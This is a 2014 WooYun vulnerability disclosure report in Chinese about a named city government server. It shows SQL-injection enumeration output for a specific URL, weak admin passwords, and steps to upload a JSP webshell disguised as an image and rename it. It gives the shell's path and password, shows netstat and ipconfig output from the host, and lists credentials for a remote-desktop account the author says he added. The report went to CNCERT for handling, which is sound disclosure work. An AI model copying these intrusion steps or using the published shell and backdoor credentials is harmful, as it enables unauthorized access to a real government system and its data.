当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071363

漏洞标题:某市政府多种漏洞导致服务器(疑似服务器位于内网)沦陷

相关厂商:某市政府

漏洞作者: 雅柏菲卡

提交时间:2014-08-07 12:13

修复时间:2014-09-21 12:14

公开时间:2014-09-21 12:14

漏洞类型:命令执行

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-07: 细节已通知厂商并且等待厂商处理中
2014-08-12: 厂商已经确认,细节仅向厂商公开
2014-08-22: 细节向核心白帽子及相关领域专家公开
2014-09-01: 细节向普通白帽子公开
2014-09-11: 细节向实习白帽子公开
2014-09-21: 细节向公众公开

简要描述:

详细说明:

........

漏洞证明:

http://nj.xiangtan.gov.cn:8080/nj/web/doc_hit_nj.jsp?documentid=17862
注射点
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XTMH
[*] XTMH1
[*] XTNJ
Database: XTNJ
[180 tables]
+--------------------------------+
| "DR$DOC_CONTENT_IDX$I"         |
| "DR$DOC_CONTENT_IDX$K"         |
| "DR$DOC_CONTENT_IDX$N"         |
| "DR$DOC_CONTENT_IDX$R"         |
| AGENT_WORKLOAD                 |
| ASSIGNMENT_AGENT               |
| CMS_GUESTINFO                  |
| CMS_INTERVEW_ANSWER            |
| CMS_INTERVIEW                  |
| CMS_INTERVIEWDETAIL            |
| CMS_INTERVIEWPHOTO             |
| CMS_INTERVIEW_RELATION         |
| CMS_LIVECONTEXT                |
| CMS_LIVEGC                     |
| CMS_LIVEGRAPHICS               |
| CMS_LIVEGRAPHICS2              |
| CMS_VIDEOFILE                  |
| CMS_VIDEOFILE2                 |
| TABLEINFO                      |
| TB_CMS_DOC_KIND                |
| TB_CMS_DOC_LEVEL               |
| TB_CMS_DOC_OPER                |
| TB_CMS_DOC_STATUS              |
| TB_CMS_DOC_STATUS_TRANS        |
| TB_CMS_FLOW                    |
| TB_CMS_FLOW_DOC_TRANS          |
| TB_SM_INPUTTYPE                |
| TD_APPLICATION_OPEN            |
| TD_CMS_ADDWATERIMAGE           |
| TD_CMS_CHANNEL                 |
| TD_CMS_CHANNELFIELD            |
| TD_CMS_CHANNEL_VOTE            |
| TD_CMS_CHNL_REF_DOC            |
| TD_CMS_COLLECT_ANSWER          |
| TD_CMS_COLLECT_IPCTRL2         |
| TD_CMS_COLLECT_TIMECTRL2       |
| TD_CMS_COLLECT_TITLE           |
| TD_CMS_CRAWL_DOCUMENT          |
| TD_CMS_CUSTOM_FORM             |
| TD_CMS_DBTSEARCH_DETAIL        |
| TD_CMS_DOCCOMMENT_DICT         |
| TD_CMS_DOCCOM_IMPEACHINFO      |
| TD_CMS_DOCSOURCE               |
| TD_CMS_DOCUMENT                |
| TD_CMS_DOCUMENT_TEMP           |
| TD_CMS_DOC_AGGREGATION         |
| TD_CMS_DOC_ARRANGE             |
| TD_CMS_DOC_ATTACH              |
| TD_CMS_DOC_COMMENT             |
| TD_CMS_DOC_DIST_MANNER         |
| TD_CMS_DOC_PUBLISHING          |
| TD_CMS_DOC_RELATED             |
| TD_CMS_DOC_TASK                |
| TD_CMS_DOC_TASK_DETAIL         |
| TD_CMS_DOC_TEMPLATE            |
| TD_CMS_DOC_VER                 |
| TD_CMS_DOC_VER_ATTACH          |
| TD_CMS_EXTFIELD                |
| TD_CMS_EXTFIELDVALUE           |
| TD_CMS_EXTVALUESCOPE           |
| TD_CMS_FILE_CHANGE_LOG         |
| TD_CMS_FILE_STATUS             |
| TD_CMS_MAILSERVERINFO          |
| TD_CMS_ORDERPUBLISH            |
| TD_CMS_PUBOBJECT_RELATION      |
| TD_CMS_SITE                    |
| TD_CMS_SITEAPPS                |
| TD_CMS_SITEFIELD               |
| TD_CMS_SITEUSER                |
| TD_CMS_SITE_SEARCH             |
| TD_CMS_SITE_TPL                |
| TD_CMS_TEMPLATE                |
| TD_CMS_TEMPLATE_STYLE          |
| TD_CMS_TMPL_EXPORT             |
| TD_CMS_VOTE_ANSWER             |
| TD_CMS_VOTE_IPCTRL             |
| TD_CMS_VOTE_ITEMS              |
| TD_CMS_VOTE_QUESTIONS          |
| TD_CMS_VOTE_TIMECTRL           |
| TD_CMS_VOTE_TITLE              |
| TD_CMS_VOTE_TQ                 |
| TD_COMM_APPLICATION            |
| TD_COMM_APPLICATION_ORGINFO    |
| TD_COMM_APPLICATION_PERSONINFO |
| TD_COMM_APPLICATION_RELATION   |
| TD_COMM_EMAILTYPE              |
| TD_COMM_EMAIL_DISPOSEDEP       |
| TD_COMM_EMAIL_KHDISPOSEDEP     |
| TD_COMM_INFO_REPORT            |
| TD_COMM_MAILTONGJI             |
| TD_COMM_OVERTURE               |
| TD_COMM_OVERTURE_STATUS        |
| TD_COMM_OVERTURE_TYPE          |
| TD_COMM_TABLE                  |
| TD_COMM_TABLE_DEPART           |
| TD_COMM_TABLE_TRANSMIT_INFO    |
| TD_COMM_TIME                   |
| TD_COMM_TZZX                   |
| TD_COMM_TZZX_CLASS             |
| TD_COMM_TZZX_TRANSMIT_INFO     |
| TD_COMM_USERQUERY              |
| TD_COMM_ZFTS                   |
| TD_COMM_ZFTS_CLASS             |
| TD_COMM_ZFTS_TRANSMIT_INFO     |
| TD_PUBLICINFO_CATALOGFIELD     |
| TD_PUBLICINFO_CLASS            |
| TD_PUBLICINFO_COMM             |
| TD_PUBLICINFO_COMM_VIEW        |
| TD_PUBLICINFO_DETAIL_CLASS     |
| TD_PUBLICINFO_EXTFIELD         |
| TD_PUBLICINFO_EXTFIELDVALUE    |
| TD_PUBLICINFO_EXTVALUESCOPE    |
| TD_REMINDINFO                  |
| TD_SD_NOTEPAPER                |
| TD_SD_NOTIC                    |
| TD_SD_RATIFYADVICE             |
| TD_SD_REMIND                   |
| TD_SD_SCHEDULAR                |
| TD_SD_SHARE                    |
| TD_SEC_SMS_INTERFACE           |
| TD_SM_DICATTACHFIELD           |
| TD_SM_DICTDATA                 |
| TD_SM_DICTKEYWORDS             |
| TD_SM_DICTTYPE                 |
| TD_SM_GROUP                    |
| TD_SM_GROUPROLE                |
| TD_SM_INITYEAR_HOLIDAY         |
| TD_SM_JOB                      |
| TD_SM_LOG                      |
| TD_SM_LOGDETAIL                |
| TD_SM_LOGDETAIL_HIS            |
| TD_SM_LOGMODULE                |
| TD_SM_LOG_HIS                  |
| TD_SM_ORGANIZATION             |
| TD_SM_ORGANIZATION_BASEINFO    |
| TD_SM_ORGANIZATION_LEADER      |
| TD_SM_ORGANIZATION_SECONDE     |
| TD_SM_ORGJOB                   |
| TD_SM_ORGJOBROLE               |
| TD_SM_ORGMANAGER               |
| TD_SM_ORGROLE                  |
| TD_SM_ORGUSER                  |
| TD_SM_PERMISSION_ORIGINE       |
| TD_SM_RES                      |
| TD_SM_ROLE                     |
| TD_SM_ROLERESOP                |
| TD_SM_ROLETYPE                 |
| TD_SM_TAXCODE_ORGANIZATION     |
| TD_SM_USER                     |
| TD_SM_USERGROUP                |
| TD_SM_USERJOBORG               |
| TD_SM_USERJOBORG_HISTORY       |
| TD_SM_USERROLE                 |
| TD_SM_USER_ADDONS              |
| TD_SP_ACCESSORIES              |
| TD_SP_ATTACHMENT               |
| TD_SP_BASEINFO                 |
| TD_SP_BASEINFO_CATALOG         |
| TD_SP_CATALOG                  |
| TD_SP_CONSULTATION             |
| TD_SP_GUIDE                    |
| TD_SP_HOLIDAY                  |
| TD_SP_LAW_RULE                 |
| TD_SP_LAW_RULE_CATALOG         |
| TD_SP_ORGANIZATION             |
| TD_SP_PRINTTEMPLATE            |
| TD_SP_PROJECT                  |
| TD_SP_QUESTION                 |
| TD_SP_QUESTION_CATALOG         |
| TD_SP_TRANSACTONLINE           |
| TD_SP_TRANSACTONLINE_INFO      |
| TD_XTMH_LIUYAN                 |
| TD_XTMH_XJXC                   |
| TEST                           |
| TL_CMS_DOC_OPER_LOG            |
| TL_CMS_SITE_FLOW_HIS           |
| T_CMS_TREE                     |
| T_CONT_SAMPLE                  |
| V_TB_RES_ORG_USER_WRITE        |
| X_TD_CMS_PUBLISHSCHEDULAR      |
+--------------------------------+
QQ截图20140807025015.png




一堆弱密码 都是123456
通过 若干扫描软件扫描到后台  http://nj.xiangtan.gov.cn:8080/login.jsp
使用弱口令的账号登陆  
在上传图片处  将jsp马先改为 .jpeg等图片格式
然后用改名功能 
如图所示



QQ截图20140807025423.png




连后缀名都改了 
<img src="/cms/siteResource/site9/_webprj/uploadfiles/200912/20140806061728766.jpeg" filename="20140806061728766.jpeg" style="cursor:hand" onclick="choosepic(this,'20140806061728766.jpeg')" name="previewPic" width="100" height="100" alt="预览"> 通过审查工具可以看到路径 
将改名后的文件名加上 /cms/siteResource/site9/_webprj/uploadfiles/200912/ 和域名 
就完成了一个拼凑
http://nj.xiangtan.gov.cn:8080/cms/siteResource/site9/_webprj/uploadfiles/200912/11111.jsp  如此 
密码 jspspy  
端口列表
端口类型	本地IP:端口	外部IP:端口	端口状态
TCP	0.0.0.0:80	0.0.0.0:0	LISTENING
TCP	0.0.0.0:81	0.0.0.0:0	LISTENING
TCP	0.0.0.0:135	0.0.0.0:0	LISTENING
TCP	0.0.0.0:1025	0.0.0.0:0	LISTENING
TCP	0.0.0.0:1029	0.0.0.0:0	LISTENING
TCP	0.0.0.0:1158	0.0.0.0:0	LISTENING
TCP	0.0.0.0:1521	0.0.0.0:0	LISTENING
TCP	0.0.0.0:3389	0.0.0.0:0	LISTENING
TCP	0.0.0.0:3938	0.0.0.0:0	LISTENING
TCP	0.0.0.0:5002	0.0.0.0:0	LISTENING
TCP	0.0.0.0:5520	0.0.0.0:0	LISTENING
TCP	0.0.0.0:5560	0.0.0.0:0	LISTENING
TCP	0.0.0.0:5580	0.0.0.0:0	LISTENING
TCP	0.0.0.0:8009	0.0.0.0:0	LISTENING
TCP	0.0.0.0:8080	0.0.0.0:0	LISTENING
TCP	127.0.0.1:1026	0.0.0.0:0	LISTENING
TCP	127.0.0.1:1047	0.0.0.0:0	LISTENING
TCP	127.0.0.1:1349	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:1648	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:2339	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:2877	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:2919	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:2920	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:2996	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:3191	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:3753	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:4141	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:4418	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:4499	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:4522	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:4620	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:4955	127.0.0.1:8009	ESTABLISHED
TCP	127.0.0.1:8005	0.0.0.0:0	LISTENING
TCP	127.0.0.1:8009	127.0.0.1:1349	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:1648	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:2339	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:2877	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:2919	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:2920	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:2996	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:3191	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:3753	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:4141	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:4418	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:4499	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:4522	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:4620	ESTABLISHED
TCP	127.0.0.1:8009	127.0.0.1:4955	ESTABLISHED
TCP	192.168.0.12:80	54.217.249.38:35238	FIN_WAIT_2
TCP	192.168.0.12:80	103.29.134.204:1551	TIME_WAIT
TCP	192.168.0.12:80	106.120.173.66:41559	TIME_WAIT
TCP	192.168.0.12:80	106.120.173.66:53961	TIME_WAIT
TCP	192.168.0.12:80	118.251.213.245:61072	ESTABLISHED
TCP	192.168.0.12:80	123.125.71.19:64217	TIME_WAIT
TCP	192.168.0.12:80	123.125.71.58:52370	TIME_WAIT
TCP	192.168.0.12:80	123.125.71.77:27125	TIME_WAIT
TCP	192.168.0.12:80	123.125.71.95:44179	TIME_WAIT
TCP	192.168.0.12:80	123.125.71.105:14565	TIME_WAIT
TCP	192.168.0.12:80	183.60.213.115:53050	TIME_WAIT
TCP	192.168.0.12:80	183.60.214.29:48691	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:1682	FIN_WAIT_2
TCP	192.168.0.12:80	218.76.24.248:2445	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:3073	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:5076	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:6208	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:6365	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:6796	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:7508	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:7733	FIN_WAIT_2
TCP	192.168.0.12:80	218.76.24.248:7737	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:8197	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:8270	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:9154	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:9729	FIN_WAIT_1
TCP	192.168.0.12:80	218.76.24.248:11485	FIN_WAIT_2
TCP	192.168.0.12:80	218.76.24.248:12290	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:12419	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:14223	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:14684	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:15373	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:16143	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:16201	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:16259	FIN_WAIT_2
TCP	192.168.0.12:80	218.76.24.248:16295	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:16577	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:17350	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:17378	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:18167	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:18184	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:18953	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:19249	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:19445	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:19931	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:20253	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:20919	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:21968	FIN_WAIT_2
TCP	192.168.0.12:80	218.76.24.248:22358	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:23460	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:23958	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:24360	FIN_WAIT_2
TCP	192.168.0.12:80	218.76.24.248:24699	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:25452	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:26112	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:26422	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:27077	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:27130	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:27999	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:28567	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:28605	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:28836	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:29823	FIN_WAIT_2
TCP	192.168.0.12:80	218.76.24.248:30631	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:31853	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:33167	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:34818	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:35367	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:35525	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:35531	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:35745	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:35934	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:36194	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:38190	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:38951	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:39419	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:39455	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:39771	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:40528	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:40598	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:41565	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:42185	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:43337	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:43775	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:44052	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:44191	FIN_WAIT_2
TCP	192.168.0.12:80	218.76.24.248:44248	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:44254	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:44325	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:45947	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:47568	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:47571	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:48437	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:48517	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:51533	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:52279	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:53069	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:53323	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:53626	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:54027	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:54626	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:57240	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:57383	TIME_WAIT
TCP	192.168.0.12:80	218.76.24.248:57399	TIME_WAIT
TCP	192.168.0.12:80	220.181.108.169:24390	TIME_WAIT
TCP	192.168.0.12:80	220.181.125.24:59635	TIME_WAIT
TCP	192.168.0.12:80	220.181.125.201:36967	TIME_WAIT
TCP	192.168.0.12:80	220.181.125.201:45535	TIME_WAIT
TCP	192.168.0.12:80	222.240.184.242:40768	TIME_WAIT
TCP	192.168.0.12:80	222.240.184.242:40769	TIME_WAIT
TCP	192.168.0.12:80	222.240.184.242:40774	TIME_WAIT
TCP	192.168.0.12:80	222.240.184.242:41513	TIME_WAIT
TCP	192.168.0.12:80	222.240.184.242:41963	TIME_WAIT
TCP	192.168.0.12:80	222.240.184.242:43060	ESTABLISHED
TCP	192.168.0.12:80	222.240.184.242:43061	ESTABLISHED
TCP	192.168.0.12:80	222.240.184.242:43066	ESTABLISHED
TCP	192.168.0.12:80	222.240.184.242:43653	ESTABLISHED
TCP	192.168.0.12:80	222.240.184.242:51680	TIME_WAIT
TCP	192.168.0.12:139	0.0.0.0:0	LISTENING
TCP	192.168.0.12:1030	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:1038	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:1041	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:1043	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:1053	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:1054	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:1190	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:1255	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:1256	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:1257	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:1030	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:1038	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:1041	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:1043	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:1053	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:1054	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:1190	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:1255	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:1256	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:1257	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:2057	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:2058	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:3203	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:3366	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:3367	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:3646	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:3647	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:3648	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:4682	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:4730	ESTABLISHED
TCP	192.168.0.12:1521	192.168.0.12:4732	ESTABLISHED
TCP	192.168.0.12:2057	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:2058	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:3203	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:3366	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:3367	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:3389	60.249.63.188:59928	ESTABLISHED
TCP	192.168.0.12:3389	61.166.77.86:2889	ESTABLISHED
TCP	192.168.0.12:3389	175.44.148.100:37770	ESTABLISHED
TCP	192.168.0.12:3389	199.83.94.76:2656	ESTABLISHED
TCP	192.168.0.12:3646	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:3647	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:3648	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:3938	192.168.0.12:4734	TIME_WAIT
TCP	192.168.0.12:3938	192.168.0.12:4736	TIME_WAIT
TCP	192.168.0.12:4051	220.181.132.166:80	ESTABLISHED
TCP	192.168.0.12:4325	101.199.97.104:80	ESTABLISHED
TCP	192.168.0.12:4682	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:4730	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:4732	192.168.0.12:1521	ESTABLISHED
TCP	192.168.0.12:4735	192.168.0.12:1158	TIME_WAIT
TCP	192.168.0.12:8080	106.120.173.66:40844	TIME_WAIT
TCP	192.168.0.12:8080	106.120.173.66:58488	TIME_WAIT
TCP	192.168.0.12:8080	175.44.148.100:38569	ESTABLISHED
UDP	0.0.0.0:1131	*:*
UDP	0.0.0.0:1293	*:*
UDP	0.0.0.0:1295	*:*
UDP	0.0.0.0:1297	*:*
UDP	0.0.0.0:1299	*:*
UDP	0.0.0.0:1300	*:*
UDP	0.0.0.0:3600	*:*
UDP	0.0.0.0:4200	*:*
UDP	0.0.0.0:4209	*:*
UDP	0.0.0.0:59357	*:*
UDP	127.0.0.1:123	*:*
UDP	127.0.0.1:1704	*:*
UDP	127.0.0.1:3334	*:*
UDP	127.0.0.1:4361	*:*
UDP	192.168.0.12:123	*:*
UDP	192.168.0.12:137	*:*
UDP	192.168.0.12:138	*:*
ipconfig的信息
Windows IP Configuration
   Host Name . . . . . . . . . . . . : ora1
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #2
   Physical Address. . . . . . . . . : 5C-F3-FC-E4-07-74
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 192.168.0.12
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.0.1
   DNS Servers . . . . . . . . . . . : 8.8.8.8
                                       4.4.4.4
服务列表  通过一系列的命令  添加了一个用户
远程桌面 nj.xiangtan.gov.cn
用户名 123123 密码 a123123



QQ截图20140807030103.png




大量数据库可流出   总管理员账号可被改  (没有完全深入)
不过服务器不错 



QQ截图20140807030626.png

修复方案:

..............

版权声明:转载请注明来源 雅柏菲卡@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-08-12 09:04

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给湖南分中心处置。

最新状态:

暂无